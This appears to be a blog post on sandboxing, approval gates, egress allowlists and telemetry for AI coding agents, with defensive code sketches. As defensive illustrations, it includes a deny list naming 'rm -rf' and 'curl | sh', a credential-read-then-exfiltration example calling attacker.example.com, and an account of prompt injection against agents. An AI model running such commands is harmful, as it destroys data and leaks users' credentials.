
Sandboxing the Coder: What OpenAI's Codex Security Model Tells Us About Agent Infrastructure

Source: openai

OpenAI just published a piece called “Running Codex safely at OpenAI”, describing the controls they wrap around their internal coding agent: sandboxing, approval gates, network egress policies, and what they call agent-native telemetry. It is a useful artifact because it shows how a company that has every incentive to ship agents quickly is actually constraining them in production. The interesting question is not whether sandboxing is a good idea (it obviously is), but what the specific shape of these controls tells us about where coding agents break, and how other tools in the same space are converging on similar answers.

I build Discord bots that occasionally execute user-supplied code, and I spend a lot of time in Claude Code and Cursor. The threat model for a coding agent is genuinely different from a chat assistant, and the OpenAI post is one of the clearer public statements of what that model looks like inside a frontier lab.

The threat model nobody used to take seriously

A chat assistant that hallucinates is embarrassing. A coding agent that hallucinates can rm -rf your repo, push secrets to a public branch, or quietly exfiltrate data through a curl call buried in a build script. The attack surface widened the moment we gave models shell access.

There are roughly three failure modes worth separating:

  1. The model makes a mistake. It writes a destructive command because it misunderstood the task.
  2. The model is manipulated. Prompt injection from a README, a dependency, an issue comment, or a webpage convinces it to do something the user did not ask for. Simon Willison has catalogued these for years, and the pattern keeps showing up in real agent deployments.
  3. The model is fine but the environment is compromised. A malicious package, a poisoned MCP server, or a hijacked dev container does the damage while the agent looks innocent.

OpenAI’s controls map cleanly onto these. Sandboxing limits blast radius for case 1. Approval gates address case 2 by forcing a human decision before anything irreversible happens, and network policies limit where a manipulated agent can send data. Telemetry is the only realistic defence against case 3, because by the time you suspect environment compromise you need a trail to follow.

Sandboxing is the unglamorous foundation

The Codex post emphasises running agents inside isolated environments with restricted filesystem and network access. This is not novel; it is just the only thing that works.

The industry has roughly settled on a few patterns:

  • Container-based isolation. OpenAI’s cloud-hosted Codex and GitHub’s Copilot coding agent run each task in an ephemeral, isolated environment. The agent gets a fresh filesystem per task, network can be filtered at the container boundary, and cleanup is a docker rm.
  • OS-level sandboxes. Claude Code uses Bubblewrap on Linux and Seatbelt on macOS, and the Codex CLI uses Seatbelt on macOS and Landlock with seccomp on Linux, to confine the process without spinning up a full container. Lower overhead than a container or VM and no dependency on a container runtime, at the cost of sharing the host kernel.
  • Remote execution. Devin, Replit Agent, and similar products move the entire workspace to a managed cloud sandbox. The user’s machine is never directly exposed.
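To make the container pattern concrete, here is a minimal Python sketch that builds a docker run command for one throwaway, per-task container. The image name, mount point, and limits are illustrative assumptions rather than any vendor’s actual configuration; the flags themselves are standard docker run options.

```python
import shlex
from pathlib import Path


def build_task_container_cmd(project_dir: str, image: str, command: list[str]) -> list[str]:
    """Return a `docker run` argv for a single agent task in a throwaway container."""
    project = Path(project_dir).resolve()
    return [
        "docker", "run",
        "--rm",                                 # delete the container when the task exits
        "--network", "none",                    # no network at all unless deliberately loosened
        "--read-only",                          # image filesystem is immutable
        "--tmpfs", "/tmp",                      # scratch space that disappears with the container
        "--cap-drop", "ALL",                    # drop every Linux capability
        "--security-opt", "no-new-privileges",  # block setuid privilege escalation
        "--pids-limit", "256",                  # cap runaway process creation
        "-v", f"{project}:/work",               # the project is the only host path mounted
        "-w", "/work",                          # run the command from the project root
        image,
        *command,
    ]


if __name__ == "__main__":
    # Print the command rather than running it, so the sketch works without Docker.
    print(shlex.join(build_task_container_cmd(".", "node:20-slim", ["npm", "test"])))
```

With --network none, anything that needs the package registry (an npm install, say) will fail. That is the point: loosening it should be a deliberate egress decision rather than a default.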

Each has trade-offs. Containers are heavy if you spin one up per command. OS sandboxes are lighter and finer-grained but harder to reason about across platforms; Seatbelt’s profile language is an undocumented Scheme-like dialect and genuinely obscure. Remote sandboxes solve isolation by punting it to someone else’s infrastructure, which moves the trust question rather than answering it.

The Codex piece does not specify which mechanism their internal deployment uses, but the principle is the same: agents should not have ambient authority over the host. That sounds obvious until you realise how many agent demos run the agent with the user’s full shell environment, full PATH, and SSH keys within reach.
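A real sandbox is the fix, but the cheapest first step toward removing ambient authority is simply not handing the agent your environment. This Python sketch runs a command with a replaced (not inherited) environment and HOME pointed at a scratch directory; the PATH value and the function name are assumptions for illustration. It is not a sandbox on its own: the child can still read anything the user can read by absolute path.

```python
import os
import subprocess
import sys
import tempfile

# Assumed minimal PATH; adjust for the tools the agent legitimately needs.
SAFE_PATH = "/usr/local/bin:/usr/bin:/bin"


def run_without_ambient_env(argv: list[str], workdir: str, timeout: float = 60.0) -> subprocess.CompletedProcess:
    """Run an agent-issued command with a fresh environment instead of the user's."""
    env = {
        "PATH": SAFE_PATH,   # no user-specific bin directories
        "HOME": workdir,     # ~/.ssh and ~/.aws now resolve inside the empty scratch dir
    }
    # Passing env= replaces os.environ entirely, so inherited tokens,
    # cloud credentials, and SSH_AUTH_SOCK never reach the child process.
    return subprocess.run(argv, cwd=workdir, env=env, capture_output=True,
                          text=True, timeout=timeout, check=False)


if __name__ == "__main__":
    os.environ["AWS_SECRET_ACCESS_KEY"] = "do-not-leak"  # simulate a secret in the user's shell
    with tempfile.TemporaryDirectory() as scratch:
        probe = "import os; print(os.environ.get('AWS_SECRET_ACCESS_KEY'))"
        result = run_without_ambient_env([sys.executable, "-c", probe], scratch)
        print(result.stdout.strip())  # the child does not see the secret
```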

Approvals are a UX problem disguised as a security problem

OpenAI describes tiered approvals: some actions run freely, some require confirmation, some are blocked outright. Claude Code’s permission modes (default, acceptEdits, plan, bypassPermissions) follow the same pattern, and Aider’s --yes-always and --auto-commits flags are a coarser version of it.

The hard part is not the policy engine. It is calibrating how often the agent asks. Too many approvals and users become habituated, clicking through whatever the agent shows. Too few and you have effectively given the agent root by default. The Codex post hints at this with the framing of agent-native telemetry feeding back into policy decisions, which is the right instinct: the static policy needs to learn from observed behaviour, not be hand-tuned forever.
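A minimal Python sketch of the three tiers, assuming simple whitespace-token prefix rules. This is illustrative only and is not how Claude Code or Codex actually match rules. Deny wins over allow, and anything unmatched falls through to a human prompt.

```python
from enum import Enum


class Decision(Enum):
    ALLOW = "allow"  # run without asking
    ASK = "ask"      # pause for human confirmation
    DENY = "deny"    # never run


def decide(command: str, allow: list[str], deny: list[str]) -> Decision:
    """Classify a shell command into one of three approval tiers."""
    tokens = command.split()

    def matches(rule: str) -> bool:
        # A rule matches when the command's leading tokens equal the rule's tokens.
        rule_tokens = rule.split()
        return tokens[:len(rule_tokens)] == rule_tokens

    if any(matches(r) for r in deny):   # deny takes precedence over allow
        return Decision.DENY
    if any(matches(r) for r in allow):
        return Decision.ALLOW
    return Decision.ASK                 # unknown commands default to a human prompt


ALLOW = ["git status", "git diff", "npm test"]
DENY = ["rm -rf", "git push --force"]

for cmd in ["git status", "git push --force origin main",
            "npm install lodash", "git push origin main --force"]:
    print(f"{cmd!r:35} -> {decide(cmd, ALLOW, DENY).value}")
```

The last command lands in ask rather than deny because --force moved to the end, where a prefix rule cannot see it. The default-to-ask fallback is what keeps that miss from becoming a silent force-push.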

A reasonable policy, written in the format of Claude Code’s settings.json, looks something like this:

{
  "permissions": {
    "allow": [
      "Bash(git status:*)",
      "Bash(git diff:*)",
      "Bash(npm test:*)",
      "Read(**/*)",
      "Grep(**/*)"
    ],
    "deny": [
      "Bash(rm -rf:*)",
      "Bash(git push --force:*)",
      "Bash(curl * | sh)"
    ]
  }
}

The denylist is where the security work hides. curl | sh is the obvious entry, and prefix rules are easy to sidestep with trivial variants such as rm -fr. The subtle cases are commands that look benign in isolation but compose into exfiltration paths, like cat ~/.aws/credentials followed by an unrelated-looking network call.
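Catching the composed case needs state across commands rather than a per-command rule. A minimal Python sketch, assuming a hypothetical list of credential markers and network tools, that flags any credential read followed (in the same command or later in the session) by a network-capable command:

```python
import os
import shlex

# Hypothetical markers and tools for illustration; real lists would be longer.
SENSITIVE_MARKERS = (".aws/credentials", ".ssh/id_", ".env")
NETWORK_TOOLS = {"curl", "wget", "nc", "scp"}


def tokenize(cmd: str) -> list[str]:
    try:
        return shlex.split(cmd)
    except ValueError:          # unbalanced quotes: fall back to a crude split
        return cmd.split()


def flag_composed_exfiltration(history: list[str]) -> list[tuple[int, int]]:
    """Return (read_index, network_index) pairs where a credential read is
    followed, at the same step or later, by a network-capable command."""
    sensitive_reads: list[int] = []
    flagged: list[tuple[int, int]] = []
    for i, cmd in enumerate(history):
        tokens = tokenize(cmd)
        if any(m in tok for tok in tokens for m in SENSITIVE_MARKERS):
            sensitive_reads.append(i)
        # basename() so /usr/bin/curl counts the same as curl; pipes are just tokens here.
        if any(os.path.basename(tok) in NETWORK_TOOLS for tok in tokens):
            flagged.extend((r, i) for r in sensitive_reads)
    return flagged


session = [
    "git status",
    "cat ~/.aws/credentials",            # benign-looking on its own
    "npm test",
    "curl -s https://attacker.example.com/?q=x",
]
print(flag_composed_exfiltration(session))  # [(1, 3)]
```

This heuristic will both over- and under-flag (a base64 pipe or a Python one-liner using urllib slips past it). Its job is to route suspicious sequences to a human, not to be the last line of defence.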

Network egress is where most of the action is

The network policy section of OpenAI’s post deserves more attention than it usually gets. A sandboxed agent that can still hit arbitrary HTTPS endpoints can leak anything in its context window through DNS, query parameters, or a webhook to attacker.example.com.

The robust answer is allowlist-based egress: the agent can talk to the package registry it needs, the API endpoints declared by the task, and nothing else. Snyk has documented how supply-chain attacks routinely use install-time scripts to exfiltrate to one-off domains, and an agent that runs npm install without egress filtering inherits that risk.
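The decision logic for an allowlist is small. This Python sketch, with a hypothetical three-host allowlist, accepts only HTTPS URLs whose hostname matches exactly. It shows the check, not the enforcement: in practice the check belongs in an egress proxy or firewall the agent cannot bypass, and DNS needs its own control because lookups leak data before any HTTP request is made.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist: the npm and PyPI registries, nothing else.
ALLOWED_HOSTS = frozenset({"registry.npmjs.org", "pypi.org", "files.pythonhosted.org"})


def egress_allowed(url: str, allowed_hosts: frozenset[str] = ALLOWED_HOSTS) -> bool:
    """Allow HTTPS requests only to hosts that exactly match the allowlist."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False                           # no plaintext HTTP, no file://, no ftp://
    host = (parts.hostname or "").rstrip(".")  # .hostname is already lowercased
    # Exact match on purpose: an endswith("npmjs.org") check would also admit evil-npmjs.org.
    return host in allowed_hosts


for url in ["https://registry.npmjs.org/lodash",
            "https://attacker.example.com/?q=secret",
            "https://registry.npmjs.org@attacker.example.com/"]:
    print(url, egress_allowed(url))
```

The last URL is the classic userinfo trick: it starts with an allowed name, but the real host is attacker.example.com, which is why the check parses the URL instead of matching on the string.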

Most developer setups today have no egress filter. The agent runs as the user, with the user’s network reachability, which is everything. Tightening this is one of the highest-leverage moves a team can make, and it does not require waiting for the agent vendor to ship anything new; an outbound firewall rule on the sandbox is enough.

Agent-native telemetry is the new ask

The phrase agent-native telemetry is the most forward-looking part of the OpenAI piece. Traditional observability assumes humans drive the system. Logs are written for humans, alerts fire for humans, and the SOC reads dashboards. Agents change the shape of the traffic: more requests, more tool calls, more decisions per minute, and decisions whose rationale lives inside a model’s context rather than in code.

What that means in practice is logging tool calls with the prompts that produced them, retaining the reasoning chain when available, and correlating actions back to the originating user intent. OpenTelemetry’s GenAI semantic conventions are moving in this direction, with span attributes for model name, token counts, and tool invocations. Langfuse, Helicone, and Arize Phoenix are building products around exactly this surface.
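As a sketch of what one such record could contain, the Python below builds a span-like dictionary for a single tool call and serialises it as a JSON line. The gen_ai.* keys are modelled on the OpenTelemetry GenAI semantic conventions, which are still evolving, so check names against the current spec; the agent.* keys and the function names are hypothetical.

```python
import json
import time


def tool_call_record(*, task_id: str, model: str, tool: str, arguments: dict,
                     prompt: str, input_tokens: int, output_tokens: int) -> dict:
    """Build one span-like record describing a single agent tool call."""
    return {
        "time_unix_nano": time.time_ns(),
        "attributes": {
            # Keys modelled on the OpenTelemetry GenAI semantic conventions.
            "gen_ai.operation.name": "execute_tool",
            "gen_ai.request.model": model,
            "gen_ai.tool.name": tool,
            # Token counts normally sit on the model-call span; flattened here for brevity.
            "gen_ai.usage.input_tokens": input_tokens,
            "gen_ai.usage.output_tokens": output_tokens,
            # Hypothetical keys for this sketch, not part of any spec.
            "agent.task.id": task_id,   # correlates the call with the originating user request
            "agent.prompt": prompt,     # the context that produced the call
            "agent.tool.arguments": json.dumps(arguments, sort_keys=True),
        },
    }


def to_json_line(record: dict) -> str:
    """Serialise a record as one line of JSON for an append-only log."""
    return json.dumps(record, sort_keys=True) + "\n"


line = to_json_line(tool_call_record(
    task_id="task-42", model="example-model", tool="bash",
    arguments={"command": "npm test"}, prompt="Run the test suite and fix failures",
    input_tokens=1200, output_tokens=85,
))
print(line, end="")
```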

For a coding agent specifically, the telemetry questions worth answering are: which files did the agent read before making a change, what commands did it run that did not produce visible output, did it ever attempt a denied action, and how did its plan evolve across turns. None of those are well-served by traditional application logs.
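Answering those questions is mostly a matter of logging the right fields. A minimal Python sketch over a hypothetical event schema (turn, tool, target, policy decision, output size) that covers three of the four questions; tracking how the plan evolves would additionally need the agent’s plan snapshotted per turn.

```python
from dataclasses import dataclass


@dataclass
class Event:
    """One logged agent action (hypothetical schema)."""
    turn: int
    tool: str                 # "read", "edit", or "bash"
    target: str               # file path or command line
    decision: str = "allow"   # policy outcome: "allow", "ask", or "deny"
    output_bytes: int = 0     # size of captured stdout/stderr


def files_read_before_edit(events: list[Event], path: str) -> list[str]:
    """Files the agent read before its first edit to `path` ([] if never edited)."""
    seen: list[str] = []
    for e in events:
        if e.tool == "edit" and e.target == path:
            return seen
        if e.tool == "read" and e.target not in seen:
            seen.append(e.target)
    return []


def denied_attempts(events: list[Event]) -> list[Event]:
    """Every action the policy layer refused."""
    return [e for e in events if e.decision == "deny"]


def silent_commands(events: list[Event]) -> list[str]:
    """Commands that actually ran but produced no visible output."""
    return [e.target for e in events
            if e.tool == "bash" and e.decision != "deny" and e.output_bytes == 0]


log = [
    Event(1, "read", "src/auth.py"),
    Event(1, "read", "README.md"),
    Event(2, "bash", "cat ~/.aws/credentials", decision="deny"),
    Event(2, "bash", "touch build.log"),
    Event(3, "edit", "src/auth.py"),
]
print(files_read_before_edit(log, "src/auth.py"), silent_commands(log))
```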

What to take from this

The Codex write-up is not a research paper and it does not need to be. It is a public statement that even OpenAI, running its own coding agent on its own infrastructure, does not give the model ambient authority. The implicit message to everyone else is that you should not either.

If you are deploying a coding agent in a team, the practical short list is small. Pick a sandbox mechanism appropriate for your platform and make sure the agent runs inside it by default. Configure an egress allowlist on that sandbox, even if it is just blocking everything except your package registry. Write a permission policy that requires approval for anything that touches the network, the filesystem outside the project, or version control history. Capture tool-call telemetry somewhere durable. The remaining gaps are things vendors will close over the next year, but the four above are within reach today.
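The four items can double as a checklist. A minimal Python sketch, assuming a hypothetical AgentDeployment description of how a team runs its agent, that reports which of the four are missing:

```python
from dataclasses import dataclass, field
from typing import Optional

# The approval gates named above: network, files outside the project, VCS history.
REQUIRED_APPROVALS = frozenset({"network", "outside_project_fs", "vcs_history"})


@dataclass
class AgentDeployment:
    """Hypothetical summary of how a team runs its coding agent."""
    sandbox: Optional[str]                 # e.g. "bubblewrap", "seatbelt", "container"; None = bare host
    egress_allowlist: Optional[set[str]]   # None = unrestricted; an empty set blocks everything
    approval_required_for: set[str] = field(default_factory=set)
    telemetry_sink: Optional[str] = None   # durable destination for tool-call logs


def audit(d: AgentDeployment) -> list[str]:
    """Return the checklist items this deployment is missing."""
    gaps = []
    if d.sandbox is None:
        gaps.append("agent runs without a sandbox")
    if d.egress_allowlist is None:
        gaps.append("no egress allowlist")
    missing = REQUIRED_APPROVALS - d.approval_required_for
    if missing:
        gaps.append("no approval gate for: " + ", ".join(sorted(missing)))
    if not d.telemetry_sink:
        gaps.append("tool-call telemetry is not captured durably")
    return gaps


print(audit(AgentDeployment(sandbox="bubblewrap",
                            egress_allowlist={"registry.npmjs.org"},
                            approval_required_for={"network"})))
```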

The agent layer is still young enough that conventions are forming. It is a good moment to push on the security side before the defaults harden in the wrong place.
